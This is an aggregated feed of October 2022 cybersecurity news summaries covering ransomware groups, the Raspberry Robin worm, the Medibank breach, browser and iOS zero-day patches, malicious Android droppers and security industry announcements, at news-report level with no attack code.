                2022-10-31 https://www.malwarebytes.com/blog/news/2022/10/raspberry-robin-worm-used-as-ransomware-prelude

                Categories: News

                Categories: Ransomware

                Tags: Raspberry Robin

                Tags: FakeUpdates

                Tags: LockBit

                Tags: Clop

                Tags: ransomware

                Microsoft warns that the Raspberry Robin worm has triggered payload alerts on devices of almost 1,000 organizations in the past 30 days and is used to introduce ransomware.

                (Read more...)

                The post Raspberry Robin worm used as ransomware prelude appeared first on Malwarebytes Labs.

                "

                Autosummary: Microsoft found that Raspberry Robin has been used to facilitate FakeUpdates (SocGholish), Fauppod, IcedID, Bumblebee, TrueBot, LockBit, and human-operated intrusions. "


                Week in review: OpenSSL critical fix, Medibank data breach, Apple fixes zero-day vulnerability

                financial exploits
                2022-10-30 https://www.helpnetsecurity.com/2022/10/30/week-in-review-openssl-critical-fix-medibank-data-breach-apple-fixes-zero-day-vulnerability/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Incoming OpenSSL critical fix: Organizations, users, get ready! The OpenSSL Project team has announced that, on November 1, 2022, they will release OpenSSL version 3.0.7, which will fix a critical vulnerability in the popular open-source cryptographic library (but does not affect OpenSSL versions before 3.0). Apple fixes exploited iOS, iPadOS zero-day (CVE-2022-42827) For the ninth time this year, Apple has … More

                The post Week in review: OpenSSL critical fix, Medibank data breach, Apple fixes zero-day vulnerability appeared first on Help Net Security.

                "

                Autosummary: New infosec products of the week: October 28, 2022 Here’s a look at the most interesting products from the past week, featuring releases from ARMO, Array, AuditBoard, Illusive, Kasten by Veeam, Prove, SkyKick, and Socure. Key observations on DDoS attacks in H1 2022 In this Help Net Security video, Juniman Kasman, CTO at Nexusguard, talks about how, while the total number of attacks did grow, the average (0.59 Gbps) and maximum (232.0 Gbps) attack sizes each decreased by 56% and 66.8%, respectively, during the same period. "


                BlackByte ransomware group hit Japanese beverage giant Asahi

                exploits
                2022-10-30 https://securityaffairs.co/wordpress/137803/cyber-crime/blackbyte-ransomware-asahi.html

                The BlackByte ransomware group claims to have compromised the Japanese beer and beverage company Asahi. Asahi Group Holdings, Ltd. is a global Japanese beer, spirits, soft drinks, and food business group. The Japanese beverage giant owns many popular brands, including Grolsch, such as Meantime, Peroni, and SABMiller. The BlackByte ransomware group claims to have stolen gigabytes of documents from Asahi, including […]

                The post BlackByte ransomware group hit Japanese beverage giant Asahi appeared first on Security Affairs.

                "

                Autosummary: "


                BlackByte ransomware group hit Asahi Group Holdings, a precision metal manufacturing and metal solution provider

                exploits industry
                2022-10-30 https://securityaffairs.co/wordpress/137803/cyber-crime/blackbyte-ransomware-asahi-group-holdings.html

                The BlackByte ransomware group claims to have compromised Asahi Group Holdings, a precision metal manufacturing and metal solution provider. Asahi Group Holdings, Ltd. is a precision metal manufacturing and metal solution provider; for more than 40 years, the company has been delivering end-to-end services in the industries of precision metals and thin-film coatings with different teams […]

                The post BlackByte ransomware group hit Asahi Group Holdings, a precision metal manufacturing and metal solution provider appeared first on Security Affairs.

                "

                Autosummary: "


                Actively exploited Windows MoTW zero-day gets unofficial patch

                exploits
                2022-10-30 https://www.bleepingcomputer.com/news/microsoft/actively-exploited-windows-motw-zero-day-gets-unofficial-patch/
                A free unofficial patch has been released for an actively exploited zero-day that allows files signed with malformed signatures to bypass Mark-of-the-Web security warnings in Windows 10 and Windows 11. [...] "

                Autosummary: Windows Mark-of-the-Web security warning (Source: BleepingComputer). What made these Magniber JavaScript files stand out was that even though they contained a Mark-of-the-Web, Windows did not display any security warnings when they were launched. "


                A massive cyberattack hit Slovak and Polish Parliaments

                ciber
                2022-10-29 https://securityaffairs.co/wordpress/137777/hacking/slovak-polish-parliaments-cyberattacks.html

                The Slovak and Polish parliaments were hit by a massive cyber attack, and the voting system in Slovakia’s legislature was brought down. A massive cyber attack hit the Slovak and Polish parliaments, the authorities reported. The cyber attack brought down the voting system in Slovakia’s legislature. “The attack was multi-directional, including from inside the Russian […]

                The post A massive cyberattack hit Slovak and Polish Parliaments appeared first on Security Affairs.

                "

                Autosummary: "


                Elektrobit and Canonical join forces to build the next generation of automotive software

                industry
                2022-10-29 https://www.helpnetsecurity.com/2022/10/30/elektrobit-canonical/

                Elektrobit and Canonical have partnered to bring the benefits of Canonical’s Ubuntu operating system to automotive software. As the industry transitions towards software-defined vehicles, the new partnership will make it easier than ever before for car makers, suppliers, and developers to create the next generation of vehicle applications, while meeting stringent automotive standards. Combining Canonical’s open-source Linux operating system with Elektrobit’s expertise in automotive-grade embedded software will enable long-term maintenance, over-the-air updates and functional vehicle … More

                The post Elektrobit and Canonical join forces to build the next generation of automotive software appeared first on Help Net Security.

                "

                Autosummary: "


                Protexxa raises $4 million to remediate gaps in cybersecurity for companies and individuals

                ciber
                2022-10-29 https://www.helpnetsecurity.com/2022/10/30/protexxa-funding/

                Cybersecurity startup Protexxa has raised CAD$4 million in seed funding. The company aims to address the risk to businesses resulting from gaps in personal cybersecurity for both companies and individuals. Its seed funding round was led by BKR Capital, which makes transformational investments in disruptive companies and promising Black technology founders. The Firehood Angels and several angel investors, including Jeff Fettes, Annette Verschuren, and Leen Li also participated in the round. The funds will be … More

                The post Protexxa raises $4 million to remediate gaps in cybersecurity for companies and individuals appeared first on Help Net Security.

                "

                Autosummary: Using artificial intelligence (AI), the Protexxa platform identifies, evaluates, predicts, and resolves common cyber issues. "


                Know the dangers you’re facing: 4 notable TTPs used by cybercriminals worldwide

                ciber
                2022-10-28 https://www.helpnetsecurity.com/2022/10/28/4-notable-ttps-used-by-cybercriminals-worldwide-video/

                In this Help Net Security video, Dmitry Bestuzhev, Most Distinguished Threat Researcher at BlackBerry, talks about some of the most interesting tactics, techniques, and procedures employed by cybercriminals in recent months. These are: the exploitation of Log4Shell; trojanization of security and privacy-focused tools; malicious ads based on the victim’s location and browser referrer; and supply-chain attacks through open-source projects.

                The post Know the dangers you’re facing: 4 notable TTPs used by cybercriminals worldwide appeared first on Help Net Security.

                "

                Autosummary: "


                Google fixes seventh Chrome zero-day exploited in attacks this year

                exploits
                2022-10-28 https://www.bleepingcomputer.com/news/security/google-fixes-seventh-chrome-zero-day-exploited-in-attacks-this-year/
                Google has released an emergency security update for the Chrome desktop web browser to address a single vulnerability known to be exploited in attacks. [...]

                Autosummary: In general, type confusion vulnerabilities occur when the program allocates a resource, object, or variable using a type and then accesses it using a different, incompatible type, resulting in out-of-bounds memory access.


                Android malware droppers with 130K installs found on Google Play

                exploits
                2022-10-28 https://www.bleepingcomputer.com/news/security/android-malware-droppers-with-130k-installs-found-on-google-play/
                A set of Android malware droppers were found infiltrating the Google Play store to install malicious programs by pretending to be app updates. [...]

                Autosummary: The droppers distributing Vultur are the following: ‘Recover Audio, Images & Videos’ (100,000 downloads), ‘Zetter Authentication’ (10,000 downloads), and ‘My Finances Tracker’ (1,000 downloads). (Figure: applications dropping Vultur malware, Threat Fabric.) Like the SharkBot droppers, these droppers also display a request to install a fake update, this time disguised as a Google Play notice. The File Manager dropper app delivers a more broadly-targeting SharkBot, configured to load overlays for banks in Italy, the UK, Germany, Spain, Poland, Austria, Australia, and the United States.


                Hackers use Microsoft IIS web server logs to control malware

                exploits
                2022-10-28 https://www.bleepingcomputer.com/news/security/hackers-use-microsoft-iis-web-server-logs-to-control-malware/
                The Cranefly hacking group, aka UNC3524, uses a previously unseen technique of controlling malware on infected devices via Microsoft Internet Information Services (IIS) web server logs. [...]

                Autosummary: (Figure: Geppei's primary function, Symantec.) Depending on the string found in the IIS log, the malware will install additional malware ("Wrde" string), execute a command ("Exco" string), or drop a tool that disables IIS logging ("Cllo" string).


                Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability

                exploits
                2022-10-28 https://thehackernews.com/2022/10/google-issues-urgent-chrome-update-to.html
                Google on Thursday rolled out emergency fixes to contain an actively exploited zero-day flaw in its Chrome web browser. The vulnerability, tracked as CVE-2022-3723, has been described as a type confusion flaw in the V8 JavaScript engine. Security researchers Jan Vojtěšek, Milánek, and Przemek Gmerek of Avast have been credited with reporting the flaw on October 25, 2022. "Google is aware of


                Raspberry Robin Operators Selling Cybercriminals Access to Thousands of Endpoints

                ciber
                2022-10-28 https://thehackernews.com/2022/10/raspberry-robin-operators-selling.html
                The Raspberry Robin worm is becoming an access-as-a-service malware for deploying other payloads, including IcedID, Bumblebee, TrueBot (aka Silence), and Clop ransomware. It is "part of a complex and interconnected malware ecosystem, with links to other malware families and alternate infection methods beyond its original USB drive spread," the Microsoft Security Threat Intelligence Center (MSTIC

                Autosummary: The Raspberry Robin worm is becoming an access-as-a-service malware for deploying other payloads, including IcedID, Bumblebee, TrueBot (aka Silence), and Clop ransomware.


                Google fixes a new actively exploited Chrome zero-day, it is the seventh one this year

                exploits
                2022-10-28 https://securityaffairs.co/wordpress/137753/hacking/7-chrome-zero-day-fixed.html

                Google on Thursday released an emergency patch for Chrome 107 to address the actively exploited zero-day vulnerability tracked as CVE-2022-3723. The CVE-2022-3723 flaw is a type confusion issue that resides in the Chrome V8 JavaScript engine. The flaw has been reported […]

                The post Google fixes a new actively exploited Chrome zero-day, it is the seventh one this year appeared first on Security Affairs.

                "

                Autosummary: "


                Apple backports fixes for CVE-2022-42827 zero-day to older iPhones, iPads

                exploits
                2022-10-28 https://securityaffairs.co/wordpress/137747/security/cve-2022-42827-zero-day-older-iphones-ipads.html

                Apple has released new security updates to backport the patches released this week for the actively exploited zero-day CVE-2022-42827 to older iPhones and iPads. Early this week, Apple addressed the ninth zero-day […]

                The post Apple backports fixes for CVE-2022-42827 zero-day to older iPhones, iPads appeared first on Security Affairs.

                "

                Autosummary: "


                Largest EU copper producer Aurubis suffers cyberattack, IT outage

                ciber
                2022-10-28 https://www.bleepingcomputer.com/news/security/largest-eu-copper-producer-aurubis-suffers-cyberattack-it-outage/
                German copper producer Aurubis has announced that it suffered a cyberattack that forced it to shut down IT systems to prevent the attack's spread. [...]


                Exploit released for critical VMware RCE vulnerability, patch now

                exploits
                2022-10-28 https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-vmware-rce-vulnerability-patch-now/
                Proof-of-concept exploit code is now available for a pre-authentication remote code execution (RCE) vulnerability allowing attackers to execute arbitrary code remotely with root privileges on unpatched Cloud Foundation and NSX Manager appliances. [...]


                These Dropper Apps On Play Store Targeting Over 200 Banking and Cryptocurrency Wallets

                financial
                2022-10-28 https://thehackernews.com/2022/10/these-dropper-apps-on-play-store.html
                Five malicious dropper Android apps with over 130,000 cumulative installations have been discovered on the Google Play Store distributing banking trojans like SharkBot and Vultur, which are capable of stealing financial data and performing on-device fraud. "These droppers continue the unstopping evolution of malicious apps sneaking to the official store," Dutch mobile security firm ThreatFabric


                The Week in Ransomware - October 28th 2022 - Healthcare leaks

                exploits ransomware
                2022-10-28 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28th-2022-healthcare-leaks/
                This week, we learned of healthcare data leaks out of Australia, information about existing attacks, and reports on how ransomware gangs operate and partner with malware developers for initial access. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @LawrenceAbrams, @BleepinComputer, @struppigel, @malwrhunterteam, @serghei, @fwosar, @Ionut_Ilascu, @DanielGallagher, @VK_Intel, @jorntvdw, @demonslay335, @billtoulas, @FourOctets, @Seifreed, @PolarToffee, @malwareforme, @AlvieriD, @_CERT_UA, @Jeremy_Kirk, @MsftSecIntel, @pcrisk, @TrendMicro, @DragosInc, and @BrettCallow. We also learned more information about new and existing ransomware attacks, such as an alleged 60 million LockBit ransomware demand on Pendragon, Hive claiming the attack on Tata Power, Medibank warning that the hackers accessed all customers' personal data, a ransomware attack on the Indianapolis Housing Agency, and Australian Clinical Labs disclosing that patient data was stolen.


                ConnectWise fixes RCE bug exposing thousands of servers to attacks

                exploits
                2022-10-28 https://www.bleepingcomputer.com/news/security/connectwise-fixes-rce-bug-exposing-thousands-of-servers-to-attacks/
                ConnectWise has released security updates to address a critical vulnerability in the ConnectWise Recover and R1Soft Server Backup Manager (SBM) secure backup solutions. [...]

                Autosummary: While patching critical vulnerabilities is always commendable, doing it at the end of the week, on a Friday evening, is unfortunate, if not dangerous, timing.


                A Chrome fix for an in-the-wild exploit is out—Check your version

                exploits
                2022-10-28 https://www.malwarebytes.com/blog/news/2022/10/update-chrome-now-and-fix-a-vulnerability-with-an-existing-exploit-for-it

                Categories: Exploits and vulnerabilities

                Categories: News

                Google has issued an update for Chrome to fix an issue in the V8 JavaScript engine

                The post A Chrome fix for an in-the-wild exploit is out—Check your version appeared first on Malwarebytes Labs.

                Autosummary: Mitigation: If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible.


                OPSWAT acquires FileScan.IO to provide organizations with malware analysis technology

                exploits
                2022-10-28 https://www.helpnetsecurity.com/2022/10/29/opswat-filescan-io/

                OPSWAT has acquired all assets of FileScan.IO, and FileScan.IO’s founder and CEO Jan Miller has joined OPSWAT as Director of Engineering of Malware Analysis Solutions. “I’m delighted to announce the FileScan.IO asset acquisition and the addition of Jan to our team,” stated Benny Czarny, Founder and CEO of OPSWAT. “Jan has continued to develop outstanding technologies over the last decade, and is committed to providing important free resources and innovative technologies to the broad cybersecurity community. … More

                The post OPSWAT acquires FileScan.IO to provide organizations with malware analysis technology appeared first on Help Net Security.

                "

                Autosummary: We look forward to enhancing the technology into an enterprise-grade, robust and mature solution to deliver the most comprehensive and innovative malware analysis platform available today.”, Czarny continued. "


                Cybersecurity’s importance and impact reaches all levels of the tech workforce

                ciber
                2022-10-27 https://www.helpnetsecurity.com/2022/10/27/cybersecurity-professionals-demand/

                Employer demand for cybersecurity professionals continues to strain talent availability, according to new data from CyberSeek. For the 12-month period ending in September 2022, employers listed 769,736 openings for cybersecurity positions or jobs requiring cybersecurity skills. Employer demand for cybersecurity workers grew 2.4 times faster than the overall rate across the U.S. economy. Nine of the 10 top months for cybersecurity job postings in the past 10 years have occurred in 2022. Despite a slight … More

                The post Cybersecurity’s importance and impact reaches all levels of the tech workforce appeared first on Help Net Security.

                "

                Autosummary: There is a similar expansion of cybersecurity skills requirements in adjacent positions such as auditor (+336%), software developer (+87%), cloud architect (+83%) and technical support engineer (+48%). "


                DHL takes top spot in brand phishing attempts

                financial
                2022-10-27 https://www.helpnetsecurity.com/2022/10/27/brand-phishing-q3-2022/

                Check Point Research has published its Brand Phishing Report for Q3 2022, which highlights the brands which were most frequently imitated by criminals in their attempts to steal individuals’ personal information or payment credentials during July, August and September. Most imitated brand in Q3 2022 phishing attempts While LinkedIn was the most imitated brand in both Q1 and Q2 2022, it’s shipping company DHL that took the top spot in Q3, accounting for twenty-two percent … More

                The post DHL takes top spot in brand phishing attempts appeared first on Help Net Security.

                "

                Autosummary: The malicious email which contained the subject “A document titled ‘Proposal’ has been shared with you on Onedrive” Fraudulent login page As always, users are encouraged to be cautious when divulging personal data and credentials to business applications or websites, and to think twice before opening email attachments or links, especially emails that claim to be from companies such as DHL, Microsoft or LinkedIn, as they are the most likely to be impersonated. "


                Open Systems MDR+ IoT secures IoT and OT devices alongside IT infrastructure

                industry
                2022-10-27 https://www.helpnetsecurity.com/2022/10/27/open-systems-mdr-iot/

                Open Systems has launched MDR+ IoT, which extends the 24×7 security monitoring of its MDR+ to protect connected devices used in Internet of Things (IoT) and Operational Technology (OT) applications. By adding IoT and OT telemetry to MDR+, customers benefit from 24×7 detection and response that correlates alerts across their IoT, OT and IT environments for maximum visibility and protection as part of a holistic security program. Corporate adoption of IoT and OT devices has … More

                The post Open Systems MDR+ IoT secures IoT and OT devices alongside IT infrastructure appeared first on Help Net Security.

                "

                Autosummary: “Combining the strength of Open Systems’ MDR+, our next generation MDR service, together with Defender for IoT allows us to minimize the threat surface across our clients’ entire infrastructures, using the same best practices, rigor and workflow that helped Open Systems win Microsoft’s Security MSSP of the Year for 2022.”, Corn added. "


                Australian Health Insurer Medibank Suffers Breach Exposing 3.9 Million Customers' Data

                financial
                2022-10-27 https://thehackernews.com/2022/10/australian-health-insurer-medibank.html
                Australian health insurance firm Medibank on Wednesday disclosed that the personal information of all of its customers had been unauthorizedly accessed following a recent ransomware attack. In an update to its ongoing investigation into the incident, the firm said the attackers had access to "significant amounts of health claims data" as well as personal data belonging to its ahm health

                Autosummary: "That data includes first names and surnames, addresses, dates of birth, Medicare numbers, policy numbers, phone numbers, and some claims data," it noted.


                Drinik Android malware now targets users of 18 Indian banks

                financial exploits
                2022-10-27 https://www.bleepingcomputer.com/news/security/drinik-android-malware-now-targets-users-of-18-indian-banks/
                A new version of the Drinik Android banking trojan targets 18 Indian banks, masquerading as the country's official tax management app to steal victims' personal information and banking credentials. [...]

                Autosummary: (Figure: code to display the fake refund message, Cyble.) This action takes the victims to a phishing page that is a clone of the real Income Tax Department site, where they are directed to enter financial information, including account number, credit card number, CVV, and card PIN.


                Twilio discloses another hack from June, blames voice phishing

                financial
                2022-10-27 https://www.bleepingcomputer.com/news/security/twilio-discloses-another-hack-from-june-blames-voice-phishing/
                Cloud communications company Twilio disclosed a new data breach stemming from a June 2022 security incident where the same attackers behind the August hack accessed some customers' information. [...]

                Autosummary: Cloudflare, which also disclosed that its employees had their credentials stolen in a similar SMS phishing attack, said the attackers failed to breach its systems after having their login attempts blocked by company-issued FIDO2-compliant hardware security keys.


                LinkedIn’s new security features fight scammers, deepfakes, and hackers

                financial
                2022-10-27 https://www.tripwire.com/state-of-security/linkedins-new-security-features-fight-scammers-deepfakes-and-malicious-hackers
                LinkedIn says it is beefing up its security in an attempt to better protect its userbase from fraudulent activity such as profiles that use AI-generated deepfake photos, and messages that may contain unwanted or harmful content. Read more in my article on the Tripwire State of Security blog.

                Autosummary: Every LinkedIn member's profile page will soon have a feature called "About this profile" where users can find out when a profile was created and last updated, as well as whether the profile's owner has verified a phone number or work email address.


                Researchers Expose Over 80 ShadowPad Malware C2 Servers

                exploits
                2022-10-27 https://thehackernews.com/2022/10/researchers-expose-over-80-shadowpad.html
                As many as 85 command-and-control (C2) servers have been discovered supported by the ShadowPad malware since September 2021, with infrastructure detected as recently as October 16, 2022. That's according to VMware's Threat Analysis Unit (TAU), which studied three ShadowPad variants using TCP, UDP, and HTTP(S) protocols for C2 communications. ShadowPad, seen as a successor to PlugX, is a modular


                Ransomware: Open Source to the Rescue

                exploits
                2022-10-27 https://thehackernews.com/2022/10/ransomware-open-source-to-rescue.html
                Automobile, Energy, Media, Ransomware? When thinking about verticals, one may not instantly think of cyber-criminality. Yet, every move made by governments, clients, and private contractors screams toward normalizing those menaces as a new vertical. Ransomware has every trait of the classical economical vertical. A thriving ecosystem of insurers, negotiators, software providers, and managed

                Autosummary: Still, they all become part-time SecOPS and need to know about containers, VMs, new protocols, and who has been using an external SaaS without notifying the IT department because it's "so super useful, we don't care if it hasn't been audited". And what about NGO, NPO, small companies, Media, eCommerce sites, etc. Did we, as humankind, ever have a major victory like dealing with a pandemic, sending people to the moon, or inventing complex IT devices, without teamwork? The ways cybercriminals break in are the same as ten years ago: exploits, social engineering, Web shenanigans, and password bruteforce, to name a few. They are less defended, require less investment, and provide fewer profits, but hey, cybercriminals need to climb the ladder too.


                Microsoft links Raspberry Robin worm to Clop ransomware attacks

                exploits ransomware
                2022-10-27 https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/
                Microsoft says a threat group tracked as DEV-0950 used Clop ransomware to encrypt the network of a victim previously infected with the Raspberry Robin worm. [...]

                Autosummary: Besides ransomware, Raspberry Robin has also been used to drop other second-stage payloads onto compromised devices, including IcedID, Bumblebee, and Truebot.


                Australian Clinical Labs says patient data stolen in ransomware attack

                exploits ransomware
                2022-10-27 https://www.bleepingcomputer.com/news/security/australian-clinical-labs-says-patient-data-stolen-in-ransomware-attack/
                Australian Clinical Labs (ACL) has disclosed a February 2022 data breach that impacted its Medlab Pathology business, exposing the medical records and other sensitive information of 223,000 people. [...]

                Autosummary: The threat actors leaked 86GB of data, including patient and employee details, financial reports, invoices, contracts, forms, subpoenas, and other private documents.


                Raspberry Robin operators are selling initial access to compromised enterprise networks to ransomware gangs

                exploits ransomware
                2022-10-27 https://securityaffairs.co/wordpress/137722/malware/raspberry-robin-clop-ransomware.html

                DEV-0950 group used Clop ransomware to encrypt the network of organizations previously infected with the Raspberry Robin worm. Microsoft has discovered recent activity that links the Raspberry Robin worm to human-operated ransomware attacks.  Data collected by Microsoft Defender for Endpoint shows that nearly 3,000 devices in almost 1,000 organizations have seen at least one RaspberryRobin […]

                The post Raspberry Robin operators are selling initial access to compromised enterprise networks to ransomware gangs appeared first on Security Affairs.

                "

                Autosummary: “Given the previously documented relationship between RaspberryRobin and DEV-0206/DEV-0243 (EvilCorp), this behavioral similarity in the initial vector for Raspberry Robin infections adds another piece of evidence to the connection between the development and propagation of Fauppod/Raspberry Robin and DEV-0206/DEV-0243.” concludes the report. "


                Apple fixes recently disclosed zero-day on older iPhones, iPads

                exploits
                2022-10-27 https://www.bleepingcomputer.com/news/security/apple-fixes-recently-disclosed-zero-day-on-older-iphones-ipads/
                Apple has released new security updates to backport patches released earlier this week to older iPhones and iPads, addressing an actively exploited zero-day bug. [...]


                What is ransomware-as-a-service and how is it evolving?

                exploits ransomware
                2022-10-27 https://www.malwarebytes.com/blog/business/2022/10/what-is-ransomware-as-a-service-and-how-is-it-evolving

                Categories: Business

                Diving into how RaaS works, why it poses a unique threat to businesses, and how small and medium-sized businesses (SMBs) can prepare for the next generation of RaaS attacks.

                The post What is ransomware-as-a-service and how is it evolving? appeared first on Malwarebytes Labs.

                Autosummary: RaaS is not much different, in theory, from the software-as-a-service (SaaS) business model, where cloud providers “rent out” their technology to you on a subscription basis—just swap out ‘cloud providers’ with ‘ransomware gangs’ and ‘technology’ with ransomware (and the related crimes involved). The fact that RaaS attacks are human-operated means that ransomware attacks are more targeted than they used to be—and targeted attacks are far more dangerous than un-targeted ones. At the forefront of this evolution from automated ransomware to human-operated ransomware attacks are ransomware-as-a-service gangs—and their new business model seems to be paying off: in 2021, ransomware gangs made at least $350 million in ransom payments.


                Medibank customers" personal data compromised by cyber attack

                financial
                2022-10-27 https://www.malwarebytes.com/blog/news/2022/10/medibank-customers-personal-data-compromised-by-cyber-attack

                Categories: News

                Tags: Medibank

                Tags: data breach

                Australian health care insurance company Medibank confirmed that the threat actor behind the cyberattack on the company had access to the data of at least 4 million customers

                The post Medibank customers' personal data compromised by cyber attack appeared first on Malwarebytes Labs.

                Autosummary: Stolen data: The cybercrime investigation shows that the criminal had access to all ahm customers’ personal data and significant amounts of health claims data; all international student customers’ personal data and significant amounts of health claims data; and all Medibank customers’ personal data and significant amounts of health claims data. This does not necessarily mean that all these data have been stolen, but Medibank has been contacted by the threat actor claiming to have stolen 200GB of data.


                How cybersecurity VCs find visionary companies in emerging sectors

                ciber
                2022-10-26 https://www.helpnetsecurity.com/2022/10/26/cybersecurity-vc/

                33N Ventures is fundraising €150 million for investing in cybersecurity and infrastructure software companies across Europe, Israel, and the US. The fund will mostly target investments at Series A and B, with an average ticket size of around €10 million, and has an investment capacity of €20 million already committed by Alantra and its strategic partners. Co-founders and managing partners Carlos Alberto Silva and Carlos Moreira da Silva have made more than 20 investments in … More

                The post How cybersecurity VCs find visionary companies in emerging sectors appeared first on Help Net Security.

                "

                Autosummary: Our strategic advisors – including leading entrepreneurs, experts, and cybersecurity decision-makers such Brian NeSmith (Arctic Wolf), Eyal Hayardeny (Reblaze), Nuno Sebastião (Feedzai), and Pierre Polette (Hackuity) – all founders of companies we’ve invested in in the past – possess an incredible depth and breadth of sector-specific knowledge and experience that, added to our own, really helps us identify and support the founders and companies with the biggest breakthrough and scaling potential.That’s not going to change – from digital transformation to national security, cyber will continue being a top priority for governments, institutions, companies, and investors across the globe, and the market is expected to reach $162 billion in 2022, with robust annual double-digit growth forecast for the coming years – and so the companies we’ll be looking at have some in-built resilience. Of course, we stay up to date with the industry, look at all publicly available sources, and attend the most relevant cybersecurity events across Europe, Israel, and the US. In this Help Net Security interview, they discuss the cybersecurity investment landscape in Europe, the strategies for finding the right companies, and more. Co-founders and managing partners Carlos Alberto Silva and Carlos Moreira da Silva have made more than 20 investments in cybersecurity and infrastructure software over the past 10 years, across Europe, Israel and the US – including most notably Arctic Wolf. "


                A quick guide for small cybersecurity teams looking to invest in cyber insurance

                ciber
                2022-10-26 https://www.helpnetsecurity.com/2022/10/26/quick-guide-for-small-cybersecurity-teams-looking-to-invest-in-cyber-insurance/

                In the world of insurance providers and policies, cyber insurance is a fairly new field, and many security teams are trying to wrap their heads around it. What is it, and do they need it? And how much time will they spend researching how to integrate cyber insurance into their strategy? For small security teams, this is particularly challenging as they contend with limited resources. Luckily, there’s a new eBook dedicated to helping small security … More

                The post A quick guide for small cybersecurity teams looking to invest in cyber insurance appeared first on Help Net Security.

                "

                Autosummary: The market varies widely, with policies often determined by insurance providers, but the primary forms of cyber insurance include: Network security systems policies which cover the cost of lawyers, IT forensic services, data restoration, breach notifications and communications, and more when a data breach, malware infection or ransomware incident occurs. Privacy liability policies which cover any costs related to a data breach that exposes personally identifiable information (PII), i.e. lawsuits, compliance violations, reputational risk management, etc. Network business interruption policies that enable a business to cover costs related to data loss or any financial losses incurred by a disruption in services. "


                Fill the cybersecurity talent gap with inquisitive job candidates

                ciber
                2022-10-26 https://www.helpnetsecurity.com/2022/10/26/cybersecurity-job-candidates/

                The impact of the Great Resignation and the Great Reshuffle is still strongly felt across many industries, including cybersecurity. There is a talent gap: Companies are struggling to hire enough talent to fulfill their needs and goals. Widen the pool of cybersecurity job candidates: According to a McKinsey Global Survey, nearly nine out of 10 executives and managers say their organizations face a skills gap or expect one to develop by 2024. This means the … More

                The post Fill the cybersecurity talent gap with inquisitive job candidates appeared first on Help Net Security.

                "

                Autosummary: It won’t be easy, and training will be necessary, but with the proper supportive environment, a diverse set of skills will help you build a stronger cybersecurity team.When beginning a career in cybersecurity, with or without a degree or previous experience in the field, there are many learning opportunities, but also multiple learning curves. "


                Vice Society Hackers Are Behind Several Ransomware Attacks Against Education Sector

                exploits ransomware
                2022-10-26 https://thehackernews.com/2022/10/vice-society-hackers-are-behind-several.html
                A cybercrime group known as Vice Society has been linked to multiple ransomware strains in its malicious campaigns aimed at the education, government, and retail sectors. The Microsoft Security Threat Intelligence team, which is tracking the threat cluster under the moniker DEV-0832, said the group avoids deploying ransomware in some cases and rather likely carries out extortion using "

                Autosummary: "Shifting ransomware payloads over time from BlackCat, Quantum Locker, and Zeppelin, DEV-0832's latest payload is a Zeppelin variant that includes Vice Society-specific file extensions, such as .v-s0ciety, .v-society, and, most recently, .locked," the tech giant's cybersecurity division said. "


                Hackers Actively Exploiting Cisco AnyConnect and GIGABYTE Drivers Vulnerabilities

                exploits
                2022-10-26 https://thehackernews.com/2022/10/hackers-actively-exploiting-cisco.html
                Cisco has warned of active exploitation attempts targeting a pair of two-year-old security flaws in the Cisco AnyConnect Secure Mobility Client for Windows. Tracked as CVE-2020-3153 (CVSS score: 6.5) and CVE-2020-3433 (CVSS score: 7.8), the vulnerabilities could enable local authenticated attackers to perform DLL hijacking and copy arbitrary files to system directories with elevated privileges. "

                Autosummary: "


                IRISSCERT brings eminent cybersecurity experts to its conference in Dublin

                ciber
                2022-10-26 https://www.helpnetsecurity.com/2022/10/26/irisscert-conference-2022-dublin/

                The Irish Reporting and Information Security Service’s (IRISSCERT) Conference on Cybercrime will be on the 10th of November 2022 in the Aviva stadium. This all-day conference will focus on providing attendees with an overview of the current cyber threats facing businesses in Ireland and what they can do to help deal with those threats. With the ransomware attack on the HSE still fresh in many people’s minds and the increasing focus on cybersecurity resulting from … More

                The post IRISSCERT brings eminent cybersecurity experts to its conference in Dublin appeared first on Help Net Security.

                "

                Autosummary: "


                Two flaws in Cisco AnyConnect Secure Mobility client for Windows actively exploited

                exploits
                2022-10-26 https://securityaffairs.co/wordpress/137654/security/cisco-anyconnect-secure-mobility-flaws.html

                Cisco warns of active exploitation attempts targeting two vulnerabilities in the Cisco AnyConnect Secure Mobility Client for Windows. Cisco is warning of exploitation attempts targeting two security flaws, tracked as CVE-2020-3153 (CVSS score: 6.5) and CVE-2020-3433 (CVSS score: 7.8), in the Cisco AnyConnect Secure Mobility Client for Windows. Both vulnerabilities are dated 2020 and are now patched. The […]

                The post Two flaws in Cisco AnyConnect Secure Mobility client for Windows actively exploited appeared first on Security Affairs.

                "

                Autosummary: "


                Outpost24: How Pentesting-as-a-Service finds vulnerabilities before they're exploited

                exploits
                2022-10-26 https://www.bleepingcomputer.com/news/security/outpost24-how-pentesting-as-a-service-finds-vulnerabilities-before-theyre-exploited/
                Organizations need to continuously monitor their entire surface infrastructure to adequately reduce application risk. This is where Outpost24's Pentesting-as-a-Service (PTaaS) software comes in. [...] "

                Autosummary: Manual testing: all our pen testing reports are peer-reviewed by our security experts, giving you the most accurate view of the vulnerability findings, including business logic errors and backdoors that automated scanners missed. Zero false positives: all vulnerabilities are peer-reviewed to ensure zero false positives in the vulnerability reports. With Outpost24's PTaaS, you can enable robust application security for your organization in order to eliminate web application vulnerabilities: PTaaS helps organizations continuously find and fix web application vulnerabilities, including runtime vulnerabilities and logical errors, before they can be exploited. Introducing Outpost24's Pentesting-as-a-Service: web application testing is critical to your organization's security posture, but the traditional pen testing process can't keep up with the pace of agile development. "


                Medibank now says hackers accessed all its customers’ personal data

                financial
                2022-10-26 https://www.bleepingcomputer.com/news/security/medibank-now-says-hackers-accessed-all-its-customers-personal-data/
                Australian insurance firm Medibank has confirmed that hackers accessed all of its customers' personal data and a large amount of health claims data during a recent ransomware attack. [...] "

                Autosummary: While data access and data exfiltration are separate things, Medibank found evidence that, in some cases, the threat actors managed to remove some of the accessed data, so customers should assume that all of this data was stolen. "


                U.S. Charges Ukrainian Hacker Over Role in Raccoon Stealer Malware Service

                exploits
